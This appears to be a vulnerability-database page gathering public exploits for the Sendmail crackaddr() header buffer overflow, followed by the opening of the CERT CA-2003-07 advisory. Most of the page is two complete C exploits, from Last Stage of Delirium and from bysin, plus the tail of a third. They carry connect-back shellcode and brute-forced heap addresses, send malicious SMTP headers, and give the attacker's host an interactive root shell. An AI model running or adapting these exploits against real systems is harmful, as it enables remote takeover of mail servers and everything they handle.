				t[j].vect = l;
				off++;
				break;
			}
		}
		pclose(f);
		if (t[j].vect) {
			int	pid;
			printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n", j, j*100/i , got, t[j].vect, offset);
			fflush(stdout);
			pid = fork();
			if (pid == 0) {
				close(1);
				sploit(victim, got, t[j].vect, esp + offset);
			}
			/* wait until sendmail finishes (expoit failed)
	                   or until SIGUSR arrives */
			wait(NULL);
			/* exploited ?? */
			if (exploited) {
				wait(NULL);	/* kill zombie */
				printf("Thanx for choosing sd's products ;)\n");
				exit(0);
			}
		}
	}
	printf("[-] All targets failed, probably not vulnerable ;(\n");
	giveup(1);
}

/* That's all. */



// milw0rm.com [2001-01-01]
		

- Vulnerability Information (22313)

Sendmail 8.12.x Header Processing Buffer Overflow Vulnerability (1) (EDBID:22313)
unix remote
2003-03-02 Verified
0 Last Stage of Delirium
N/A
source: http://www.securityfocus.com/bid/6991/info

Sendmail is prone to a remote buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.

Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.

Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree. 

/*## copyright LAST STAGE OF DELIRIUM mar 2003 poland        *://lsd-pl.net/ #*/
/*## sendmail 8.11.6                                                         #*/

/* proof of concept code for remote sendmail vulnerability                    */
/* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr]       */
/*                               [-c count] [-t timeout] [-v 80]              */
/* where:                                                                     */
/*   target - address of the target host to run this code against             */
/*   localaddr - address of the host you are running this code from           */
/*   localport - local port that will listen for shellcode connection         */
/*   ptr - base ptr of the sendmail buffer containing our arbitrary data      */
/*   count - brute force loop counter                                         */
/*   timeout - select call timeout while waiting for shellcode connection     */
/*   v - version of the target OS (currently only Slackware 8.0 is supported) */
/*                                                                            */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

#define NOP  0xf8

#define MAXLINE 2048
#define PNUM    12

#define OFF1 (288+156-12)
#define OFF2 (1088+288+156+20+48)
#define OFF3 (139*2)

int tab[]={23,24,25,26};

#define IDX2PTR(i) (PTR+i-OFF1)
#define ALLOCBLOCK(idx,size) memset(&lookup[idx],1,size)

#define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||\
                        (((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0)))

#define AOFF 33
#define AMSK 38
#define POFF 48
#define PMSK 53

char* lookup=NULL;
int   gfirst;

char shellcode[]=               /* 116 bytes                      */
    "\xeb\x02"                  /* jmp    <shellcode+4>           */
    "\xeb\x08"                  /* jmp    <shellcode+12>          */
    "\xe8\xf9\xff\xff\xff"      /* call   <shellcode+2>           */
    "\xcd\x7f"                  /* int    $0x7f                   */
    "\xc3"                      /* ret                            */
    "\x5f"                      /* pop    %edi                    */
    "\xff\x47\x01"              /* incl   0x1(%edi)               */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\x50"                      /* push   %eax                    */
    "\x6a\x01"                  /* push   $0x1                    */
    "\x6a\x02"                  /* push   $0x2                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\xb0\x66"                  /* mov    $0x66,%al               */
    "\x31\xdb"                  /* xor    %ebx,%ebx               */
    "\x43"                      /* inc    %ebx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\xba\xff\xff\xff\xff"      /* mov    $0xffffffff,%edx        */
    "\xb9\xff\xff\xff\xff"      /* mov    $0xffffffff,%ecx        */
    "\x31\xca"                  /* xor    %ecx,%edx               */
    "\x52"                      /* push   %edx                    */
    "\xba\xfd\xff\xff\xff"      /* mov    $0xfffffffd,%edx        */
    "\xb9\xff\xff\xff\xff"      /* mov    $0xffffffff,%ecx        */
    "\x31\xca"                  /* xor    %ecx,%edx               */
    "\x52"                      /* push   %edx                    */
    "\x54"                      /* push   %esp                    */
    "\x5e"                      /* pop    %esi                    */
    "\x6a\x10"                  /* push   $0x10                   */
    "\x56"                      /* push   %esi                    */
    "\x50"                      /* push   %eax                    */
    "\x50"                      /* push   %eax                    */
    "\x5e"                      /* pop    %esi                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\xb0\x66"                  /* mov    $0x66,%al               */
    "\x6a\x03"                  /* push   $0x3                    */
    "\x5b"                      /* pop    %ebx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\x56"                      /* push   %esi                    */
    "\x5b"                      /* pop    %ebx                    */
    "\x31\xc9"                  /* xor    %ecx,%ecx               */
    "\xb1\x03"                  /* mov    $0x3,%cl                */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\xb0\x3f"                  /* mov    $0x3f,%al               */
    "\x49"                      /* dec    %ecx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\x41"                      /* inc    %ecx                    */
    "\xe2\xf6"                  /* loop   <shellcode+81>          */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\x50"                      /* push   %eax                    */
    "\x68\x2f\x2f\x73\x68"      /* push   $0x68732f2f             */
    "\x68\x2f\x62\x69\x6e"      /* push   $0x6e69622f             */
    "\x54"                      /* push   %esp                    */
    "\x5b"                      /* pop    %ebx                    */
    "\x50"                      /* push   %eax                    */
    "\x53"                      /* push   %ebx                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\x31\xd2"                  /* xor    %edx,%edx               */
    "\xb0\x0b"                  /* mov    $0xb,%al                */
    "\xff\xd7"                  /* call   *%edi                   */
;

int PTR,MPTR=0xbfffa01c;

void putaddr(char* p,int i) {
 *p++=(i&0xff);
 *p++=((i>>8)&0xff);
 *p++=((i>>16)&0xff);
 *p++=((i>>24)&0xff);
}

void sendcommand(int sck,char *data,char resp) {
 char buf[1024];
 int i;
 if (send(sck,data,strlen(data),0)<0) {
  perror("error");exit(-1);
 }
 if (resp) {
  if ((i=recv(sck,buf,sizeof(buf),0))<0) {
   perror("error");exit(-1);
  }
  buf[i]=0;
  printf("%s",buf);
 }
}

int rev(int a){
 int i=1;
 if((*(char*)&i)) return(a);
 return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}

void initlookup() {
 int i;
 if (!(lookup=(char*)malloc(MAXLINE))) {
  printf("error: malloc\n");exit(-1);
 }
 ALLOCBLOCK(0,MAXLINE);
 memset(lookup+OFF1,0,OFF2-OFF1);

 for(i=0;i<sizeof(tab)/4;i++)
  ALLOCBLOCK(OFF1+4*tab[i],4);

 gfirst=1;
}

int validaddr(int addr) {
 unsigned char buf[4],c;
 int i,*p=(int*)buf;
 *p=addr;
 for(i=0;i<4;i++) {
  c=buf[i];
  if (NOTVALIDCHAR(c)) return 0;
 }
 return 1;
}

int freeblock(int idx,int size) {
 int i,j;
 for(i=j=0;i<size;i++) {
  if (!lookup[idx+i]) j++;
 }
 return (i==j);
}

int findblock(int addr,int size,int begin) {
 int i,j,idx,ptr;
 ptr=addr;
 if (begin) {
  idx=OFF1+addr-PTR;
  while(1) {
   while(((!validaddr(ptr))||lookup[idx])&&(idx<OFF2)) {
    idx+=4;
    ptr+=4;
   }
   if (idx>=OFF2) return 0;
   if (freeblock(idx,size)) return idx;
   idx+=4;
   ptr+=4;
  }
 } else {
  idx=addr-PTR;
  while(1) {
   while(((!validaddr(ptr))||lookup[idx])&&(idx>OFF1)) {
    idx-=4;
    ptr-=4;
   }
   if (idx<OFF1) return 0;
   if (freeblock(idx,size)) return idx;
   idx-=4;
   ptr-=4;
  }
 }
}

int findsblock(int sptr) {
 int optr,sidx,size;

 size=gfirst ? 0x2c:0x04;
 optr=sptr;
 while(sidx=findblock(sptr,size,1)) {
  sptr=IDX2PTR(sidx);
  if (gfirst) {
   if (validaddr(sptr)) {
    ALLOCBLOCK(sidx,size);
    break;
   } else sptr=optr;
  } else {
   if (validaddr(sptr-0x18)&&freeblock(sidx-0x18,4)&&freeblock(sidx+0x0c,4)&&
       freeblock(sidx+0x10,4)&&freeblock(sidx-0x0e,4)) {
    ALLOCBLOCK(sidx-0x18,4);
    ALLOCBLOCK(sidx-0x0e,2);
    ALLOCBLOCK(sidx,4);
    ALLOCBLOCK(sidx+0x0c,4);
    ALLOCBLOCK(sidx+0x10,4);
    sidx-=0x18;
    break;
   } else sptr=optr;
  }
  sptr+=4;
  optr=sptr;
  }
 gfirst=0;
 return sidx;
}

int findfblock(int fptr,int i1,int i2,int i3) {
 int fidx,optr;
 optr=fptr;
 while(fidx=findblock(fptr,4,0)) {
  fptr=IDX2PTR(fidx);
  if (validaddr(fptr-i2)&&validaddr(fptr-i2-i3)&&freeblock(fidx-i3,4)&&
      freeblock(fidx-i2-i3,4)&&freeblock(fidx-i2-i3+i1,4)) {
   ALLOCBLOCK(fidx,4);
   ALLOCBLOCK(fidx-i3,4);
   ALLOCBLOCK(fidx-i2-i3,4);
   ALLOCBLOCK(fidx-i2-i3+i1,4);
   break;
  } else fptr=optr;
  fptr-=4;
  optr=fptr;
 }
 return fidx;
}

void findvalmask(char* val,char* mask,int len) {
 int i;
 unsigned char c,m;
 for(i=0;i<len;i++) {
  c=val[i];
  m=0xff;
  while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--;
  val[i]=c^m;
  mask[i]=m;
 }
}

void initasmcode(char *addr,int port) {
 char abuf[4],amask[4],pbuf[2],pmask[2];
 char name[256];
 struct hostent *hp;
 int i;

 if (!addr) gethostname(name,sizeof(name));
  else strcpy(name,addr);

 if ((i=inet_addr(name))==-1) {
  if ((hp=gethostbyname(name))==NULL) {
   printf("error: address\n");exit(-1);
  }
  memcpy(&i,hp->h_addr,4);
 }

 putaddr(abuf,rev(i));

 pbuf[0]=(port>>8)&0xff;
 pbuf[1]=(port)&0xff;

 findvalmask(abuf,amask,4);
 findvalmask(pbuf,pmask,2);

 memcpy(&shellcode[AOFF],abuf,4);
 memcpy(&shellcode[AMSK],amask,4);
 memcpy(&shellcode[POFF],pbuf,2);
 memcpy(&shellcode[PMSK],pmask,2);
}

int main(int argc,char **argv){
    int sck,srv,i,j,cnt,jidx,aidx,sidx,fidx,aptr,sptr,fptr,ssize,fsize,jmp;
    int c,l,i1,i2,i3,i4,found,vers=80,count=256,timeout=1,port=25;
    fd_set readfs;
    struct timeval t;
    struct sockaddr_in address;
    struct hostent *hp;
    char buf[4096],cmd[4096];
    char *p,*host,*myhost=NULL;

    printf("copyright LAST STAGE OF DELIRIUM mar 2003 poland //lsd-pl.net/\n");
    printf("sendmail 8.11.6 for Slackware 8.0 x86\n\n");

    if (argc<3) {
     printf("usage: %s target [-l localaddr] [-b localport] [-p ptr] [-c count] [-t timeout] [-v 80]\n",argv[0]);
     exit(-1);
    }

    while((c=getopt(argc-1,&argv[1],"b:c:l:p:t:v:"))!=-1) {
     switch(c) {
      case 'b': port=atoi(optarg);break;
      case 'c': count=atoi(optarg);break;
      case 'l': myhost=optarg;break;
      case 't': timeout=atoi(optarg);break;
      case 'v': vers=atoi(optarg);break;
      case 'p': sscanf(optarg,"%x",&MPTR);
     }
    }

    host=argv[1];

    srv=socket(AF_INET,SOCK_STREAM,0);
    bzero(&address,sizeof(address));
    address.sin_family=AF_INET;
    address.sin_port=htons(port);
    if (bind(srv,(struct sockaddr*)&address,sizeof(address))==-1) {
     printf("error: bind\n");exit(-1);
    }
    if (listen(srv,10)==-1) {
     printf("error: listen\n");exit(-1);
    }

    initasmcode(myhost,port);

    for(i4=0;i4<count;i4++,MPTR+=cnt*4) {
     PTR=MPTR;
     sck=socket(AF_INET,SOCK_STREAM,0);
     bzero(&address,sizeof(address));
     address.sin_family=AF_INET;
     address.sin_port=htons(25);
     if ((address.sin_addr.s_addr=inet_addr(host))==-1) {
      if ((hp=gethostbyname(host))==NULL) {
       printf("error: address\n");exit(-1);
      }
      memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
     }
     if (connect(sck,(struct sockaddr*)&address,sizeof(address))==-1) {
      printf("error: connect\n");exit(-1);
     }
     initlookup();

     sendcommand(sck,"helo yahoo.com\n",0);
     sendcommand(sck,"mail from: anonymous@yahoo.com\n",0);
     sendcommand(sck,"rcpt to: lp\n",0);
     sendcommand(sck,"data\n",0);

     aidx=findblock(PTR,PNUM*4,1);
     ALLOCBLOCK(aidx,PNUM*4);
     aptr=IDX2PTR(aidx);

     printf(".");fflush(stdout);

     jidx=findblock(PTR,strlen(shellcode)+PNUM*4,1);
     ALLOCBLOCK(jidx,strlen(shellcode)+PNUM*4);

     switch(vers) {
      case 80: l=28;i1=0x46;i2=0x94;i3=0x1c;break;
      default: exit(-1);
     }

     i2-=8;

     p=buf;
     for(i=0;i<138;i++) {
      *p++='<';*p++='>';
     }
     *p++='(';
     for(i=0;i<l;i++) *p++=NOP;
     *p++=')';
     *p++=0;

     putaddr(&buf[OFF3+l],aptr);
     sprintf(cmd,"From: %s\n",buf);
     sendcommand(sck,cmd,0);
     sendcommand(sck,"Subject: hello\n",0);
     memset(cmd,NOP,MAXLINE);
     cmd[MAXLINE-2]='\n';
     cmd[MAXLINE-1]=0;

     cnt=0;

     while(cnt<PNUM) {
      sptr=aptr;
      fptr=IDX2PTR(OFF2);

      if (!(sidx=findsblock(sptr))) break;
      sptr=IDX2PTR(sidx);
      if (!(fidx=findfblock(fptr,i1,i2,i3))) break;
      fptr=IDX2PTR(fidx);

      jmp=IDX2PTR(jidx);
      while (!validaddr(jmp)) jmp+=4;

      putaddr(&cmd[aidx],sptr);
      putaddr(&cmd[sidx+0x24],aptr);
      putaddr(&cmd[sidx+0x28],aptr);
      putaddr(&cmd[sidx+0x18],fptr-i2-i3);

      putaddr(&cmd[fidx-i2-i3],0x01010101);
      putaddr(&cmd[fidx-i2-i3+i1],0xfffffff8);

      putaddr(&cmd[fidx-i3],fptr-i3);
      putaddr(&cmd[fidx],jmp);

      aidx+=4;
      PTR-=4;
      cnt++;
     }

     p=&cmd[jidx+4*PNUM];
      for(i=0;i<strlen(shellcode);i++) {
      *p++=shellcode[i];
     }
     sendcommand(sck,cmd,0);
     sendcommand(sck,"\n",0);
     sendcommand(sck,".\n",0);
     free(lookup);

     FD_ZERO(&readfs);
     FD_SET(0,&readfs);
     FD_SET(srv,&readfs);

     t.tv_sec=timeout;
     t.tv_usec=0;

     if (select(srv+1,&readfs,NULL,NULL,&t)>0) {
      close(sck);
      found=1;
      if ((sck=accept(srv,(struct sockaddr*)&address,&l))==-1) {
        printf("error: accept\n");exit(-1);
      }
      close(srv);

      printf("\nbase 0x%08x mcicache 0x%08x\n",PTR,aptr);

      write(sck,"/bin/uname -a\n",14);
     } else {
      close(sck);
      found=0;
     }

     while(found){
        FD_ZERO(&readfs);
        FD_SET(0,&readfs);
        FD_SET(sck,&readfs);
        if(select(sck+1,&readfs,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&readfs)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                     else {printf("koniec\n");exit(-1);}
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&readfs)){
                if((cnt=read(sck,buf,1024))<1){
                     if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                     else {printf("koniec\n");exit(-1);}
                }
                write(1,buf,cnt);
            }
        }
    }
  }
}
		

- Vulnerability information (22314)

Sendmail 8.12.x Header Processing Buffer Overflow Vulnerability (2) (EDBID:22314)
unix remote
2003-03-02 Verified
0 bysin
N/A
source: http://www.securityfocus.com/bid/6991/info
 
Sendmail is prone to a remote buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.
 
Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.
 
Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree. 

/* Sendmail <8.12.8 crackaddr() exploit by bysin */
/*            from the l33tsecurity crew         */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

int maxarch=1;
struct arch {
	char *os;
	int angle,nops;
	unsigned long aptr;
} archs[] = {
	{"Slackware 8.0 with sendmail 8.11.4",138,1,0xbfffbe34}
};


/////////////////////////////////////////////////////////

#define LISTENPORT 2525
#define BUFSIZE 4096

char code[]=                    /* 116 bytes                      */
    "\xeb\x02"                  /* jmp    <shellcode+4>           */
    "\xeb\x08"                  /* jmp    <shellcode+12>          */
    "\xe8\xf9\xff\xff\xff"      /* call   <shellcode+2>           */
    "\xcd\x7f"                  /* int    $0x7f                   */
    "\xc3"                      /* ret                            */
    "\x5f"                      /* pop    %edi                    */
    "\xff\x47\x01"              /* incl   0x1(%edi)               */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\x50"                      /* push   %eax                    */
    "\x6a\x01"                  /* push   $0x1                    */
    "\x6a\x02"                  /* push   $0x2                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\xb0\x66"                  /* mov    $0x66,%al               */
    "\x31\xdb"                  /* xor    %ebx,%ebx               */
    "\x43"                      /* inc    %ebx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\xba\xff\xff\xff\xff"      /* mov    $0xffffffff,%edx        */
    "\xb9\xff\xff\xff\xff"      /* mov    $0xffffffff,%ecx        */
    "\x31\xca"                  /* xor    %ecx,%edx               */
    "\x52"                      /* push   %edx                    */
    "\xba\xfd\xff\xff\xff"      /* mov    $0xfffffffd,%edx        */
    "\xb9\xff\xff\xff\xff"      /* mov    $0xffffffff,%ecx        */
    "\x31\xca"                  /* xor    %ecx,%edx               */
    "\x52"                      /* push   %edx                    */
    "\x54"                      /* push   %esp                    */
    "\x5e"                      /* pop    %esi                    */
    "\x6a\x10"                  /* push   $0x10                   */
    "\x56"                      /* push   %esi                    */
    "\x50"                      /* push   %eax                    */
    "\x50"                      /* push   %eax                    */
    "\x5e"                      /* pop    %esi                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\xb0\x66"                  /* mov    $0x66,%al               */
    "\x6a\x03"                  /* push   $0x3                    */
    "\x5b"                      /* pop    %ebx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\x56"                      /* push   %esi                    */
    "\x5b"                      /* pop    %ebx                    */
    "\x31\xc9"                  /* xor    %ecx,%ecx               */
    "\xb1\x03"                  /* mov    $0x3,%cl                */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\xb0\x3f"                  /* mov    $0x3f,%al               */
    "\x49"                      /* dec    %ecx                    */
    "\xff\xd7"                  /* call   *%edi                   */
    "\x41"                      /* inc    %ecx                    */
    "\xe2\xf6"                  /* loop   <shellcode+81>          */
    "\x31\xc0"                  /* xor    %eax,%eax               */
    "\x50"                      /* push   %eax                    */
    "\x68\x2f\x2f\x73\x68"      /* push   $0x68732f2f             */
    "\x68\x2f\x62\x69\x6e"      /* push   $0x6e69622f             */
    "\x54"                      /* push   %esp                    */
    "\x5b"                      /* pop    %ebx                    */
    "\x50"                      /* push   %eax                    */
    "\x53"                      /* push   %ebx                    */
    "\x54"                      /* push   %esp                    */
    "\x59"                      /* pop    %ecx                    */
    "\x31\xd2"                  /* xor    %edx,%edx               */
    "\xb0\x0b"                  /* mov    $0xb,%al                */
    "\xff\xd7"                  /* call   *%edi                   */
;


void header() {
	printf("\nSendmail <8.12.8 crackaddr() exploit by bysin\n");
	printf("           from the l33tsecurity crew        \n\n");
}

void printtargets() {
	unsigned long i;
	header();
	printf("\t  Target\t Addr\t\t OS\n");
	printf("\t-------------------------------------------\n");
	for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].aptr,archs[i].os);
	printf("\n");
}

void writesocket(int sock, char *buf) {
	if (send(sock,buf,strlen(buf),0) <= 0) {
		printf("Error writing to socket\n");
		exit(0);
	}
}

void readsocket(int sock, int response) {
	char temp[BUFSIZE];
	memset(temp,0,sizeof(temp));
	if (recv(sock,temp,sizeof(temp),0) <= 0) {
		printf("Error reading from socket\n");
		exit(0);
	}
	if (response != atol(temp)) {
		printf("Bad response: %s\n",temp);
		exit(0);
	}
}

int readutil(int sock, int response) {
	char temp[BUFSIZE],*str;
	while(1) {
		fd_set readfs;
		struct timeval tm;
		FD_ZERO(&readfs);
		FD_SET(sock,&readfs);
		tm.tv_sec=1;
		tm.tv_usec=0;
		if(select(sock+1,&readfs,NULL,NULL,&tm) <= 0) return 0;
		memset(temp,0,sizeof(temp));
		if (recv(sock,temp,sizeof(temp),0) <= 0) {
			printf("Error reading from socket\n");
			exit(0);
		}
		str=(char*)strtok(temp,"\n");
		while(str && *str) {
			if (atol(str) == response) return 1;
			str=(char*)strtok(NULL,"\n");
		}
	}
}

#define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||(((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0)))

void findvalmask(char* val,char* mask,int len) {
	int i;
	unsigned char c,m;
	for(i=0;i<len;i++) {
		c=val[i];
		m=0xff;
		while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--;
		val[i]=c^m;
		mask[i]=m;
	}
}

void fixshellcode(char *host, unsigned short port) {
	unsigned long ip;
	char abuf[4],amask[4],pbuf[2],pmask[2];
	if ((ip = inet_addr(host)) == -1) {
		struct hostent *hostm;
		if ((hostm=gethostbyname(host)) == NULL) {
			printf("Unable to resolve local address\n");
			exit(0);
		}
		memcpy((char*)&ip, hostm->h_addr, hostm->h_length);
	}
	abuf[3]=(ip>>24)&0xff;
	abuf[2]=(ip>>16)&0xff;
	abuf[1]=(ip>>8)&0xff;
	abuf[0]=(ip)&0xff;
	pbuf[0]=(port>>8)&0xff;
	pbuf[1]=(port)&0xff;
	findvalmask(abuf,amask,4);
	findvalmask(pbuf,pmask,2);
	memcpy(&code[33],abuf,4);
	memcpy(&code[38],amask,4);
	memcpy(&code[48],pbuf,2);
	memcpy(&code[53],pmask,2);
}

void getrootprompt() {
	int sockfd,sin_size,tmpsock,i;
	struct sockaddr_in my_addr,their_addr;
	char szBuffer[1024];
	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Error creating listening socket\n");
		return;
	}
	my_addr.sin_family = AF_INET;
	my_addr.sin_port = htons(LISTENPORT);
	my_addr.sin_addr.s_addr = INADDR_ANY;
	memset(&(my_addr.sin_zero), 0, 8);
	if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
		printf("Error binding listening socket\n");
		return;
	}
	if (listen(sockfd, 1) == -1) {
		printf("Error listening on listening socket\n");
		return;
	}
	sin_size = sizeof(struct sockaddr_in);
	if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) {
		printf("Error accepting on listening socket\n");
		return;
	}
	writesocket(tmpsock,"uname -a\n");
	while(1) {
		fd_set readfs;
		FD_ZERO(&readfs);
		FD_SET(0,&readfs);
		FD_SET(tmpsock,&readfs);
		if(select(tmpsock+1,&readfs,NULL,NULL,NULL)) {
			int cnt;
			char buf[1024];
			if (FD_ISSET(0,&readfs)) {
				if ((cnt=read(0,buf,1024)) < 1) {
					if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
                			else {
						printf("Connection closed\n");
						return;
					}
				}
				write(tmpsock,buf,cnt);
			}
			if (FD_ISSET(tmpsock,&readfs)) {
				if ((cnt=read(tmpsock,buf,1024)) < 1) {
					if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
                			else {
						printf("Connection closed\n");
						return;
					}
				}
				write(1,buf,cnt);
			}
		}
	}
	close(tmpsock);
	close(sockfd);
	return;
}

int main(int argc, char **argv) {
	struct sockaddr_in server;
	unsigned long ipaddr,i,bf=0;
	int sock,target;
	char tmp[BUFSIZE],buf[BUFSIZE],*p;
	if (argc <= 3) {
		printf("%s <target ip> <myip> <target number> [bruteforce start addr]\n",argv[0]);
		printtargets();
		return 0;
	}
	target=atol(argv[3]);
	if (target < 0 || target >= maxarch) {
		printtargets();
		return 0;
	}
	if (argc > 4) sscanf(argv[4],"%x",&bf);

	header();

	fixshellcode(argv[2],LISTENPORT);
	if (bf && !fork()) {
		getrootprompt();
		return 0;
	}

bfstart:
	if (bf) {
		printf("Trying address 0x%x\n",bf);
		fflush(stdout);
	}
	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Unable to create socket\n");
		exit(0);
	}
	server.sin_family = AF_INET;
	server.sin_port = htons(25);
	if (!bf) {
		printf("Resolving address... ");
		fflush(stdout);
	}
	if ((ipaddr = inet_addr(argv[1])) == -1) {
		struct hostent *hostm;
		if ((hostm=gethostbyname(argv[1])) == NULL) {
			printf("Unable to resolve address\n");
			exit(0);
		}
		memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
	}
	else server.sin_addr.s_addr = ipaddr;
	memset(&(server.sin_zero), 0, 8);
	if (!bf) {
		printf("Address found\n");
		printf("Connecting... ");
		fflush(stdout);
	}
	if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
		printf("Unable to connect\n");
		exit(0);
	}
	if (!bf) {
		printf("Connected!\n");
		printf("Sending exploit... ");
		fflush(stdout);
	}
	readsocket(sock,220);
	writesocket(sock,"HELO yahoo.com\r\n");
	readsocket(sock,250);
	writesocket(sock,"MAIL FROM: spiderman@yahoo.com\r\n");
	readsocket(sock,250);
	writesocket(sock,"RCPT TO: MAILER-DAEMON\r\n");
	readsocket(sock,250);
	writesocket(sock,"DATA\r\n");
	readsocket(sock,354);
	memset(buf,0,sizeof(buf));
	p=buf;
	for (i=0;i<archs[target].angle;i++) {
		*p++='<';
		*p++='>';
	}
	*p++='(';
	for (i=0;i<archs[target].nops;i++) *p++=0xf8;
	*p++=')';
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];
	*p++=0;
	sprintf(tmp,"Full-name: %s\r\n",buf);
	writesocket(sock,tmp);
	sprintf(tmp,"From: %s\r\n",buf);
	writesocket(sock,tmp);

	p=buf;
	archs[target].aptr+=4;
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];

	for (i=0;i<0x14;i++) *p++=0xf8;
	archs[target].aptr+=0x18;
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];

	for (i=0;i<0x4c;i++) *p++=0x01;
	archs[target].aptr+=0x4c+4;
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];

	for (i=0;i<0x8;i++) *p++=0xf8;
	archs[target].aptr+=0x08+4;
	*p++=((char*)&archs[target].aptr)[0];
	*p++=((char*)&archs[target].aptr)[1];
	*p++=((char*)&archs[target].aptr)[2];
	*p++=((char*)&archs[target].aptr)[3];

	for (i=0;i<0x20;i++) *p++=0xf8;
	for (i=0;i<strlen(code);i++) *p++=code[i];

	*p++=0;
	sprintf(tmp,"Subject: AAAAAAAAAAA%s\r\n",buf);
	writesocket(sock,tmp);
	writesocket(sock,".\r\n");
	if (!bf) {
		printf("Exploit sent!\n");
		printf("Waiting for root prompt...\n");
		if (readutil(sock,451)) printf("Failed!\n");
		else getrootprompt();
	}
	else {
		readutil(sock,451);
		close(sock);
		bf+=4;
		goto bfstart;
	}
}


		

- Vulnerability information (F30866)

CA-2003-07.sendmail (PacketStormID:F30866)
2003-03-04 00:00:00
 
remote,root
CVE-2002-1337

CERT Advisory CA-2003-07 - Sendmail prior to 8.12.8 has a remote root vulnerability which can be exploited by a malicious mail message, allowing non-vulnerable MTAs to relay the exploit message to unpatched MTAs on an internal network. A successful attack against an unpatched sendmail system will not leave any messages in the logs. All Sendmail Pro, Sendmail Switch, and Sendmail for NT are also vulnerable. Fix available here.

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail

   Original release date: March 3, 2003
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

     * Sendmail Pro (all versions)
     * Sendmail Switch 2.1 prior to 2.1.5
     * Sendmail Switch 2.2 prior to 2.2.5
     * Sendmail Switch 3.0 prior to 3.0.3
     * Sendmail for NT 2.X prior to 2.6.2
     * Sendmail for NT 3.0 prior to 3.0.3
     * Systems  running  open-source  sendmail  versions prior to 8.12.8,
       including UNIX and Linux systems

Overview

   There  is  a vulnerability in sendmail that may allow remote attackers
   to gain the privileges of the sendmail daemon, typically root.

I. Description

   Researchers  at  Internet  Security  Systems  (ISS)  have discovered a
   remotely  exploitable  vulnerability  in  sendmail. This vulnerability
   could  allow  an  intruder  to  gain  control of a vulnerable sendmail
   server.

   Most  organizations  have  a variety of mail transfer agents (MTAs) at
   various  locations  within their network, with at least one exposed to
   the   Internet.   Since   sendmail  is  the  most  popular  MTA,  most
   medium-sized  to  large  organizations are likely to have at least one
   vulnerable   sendmail   server.  In  addition,  many  UNIX  and  Linux
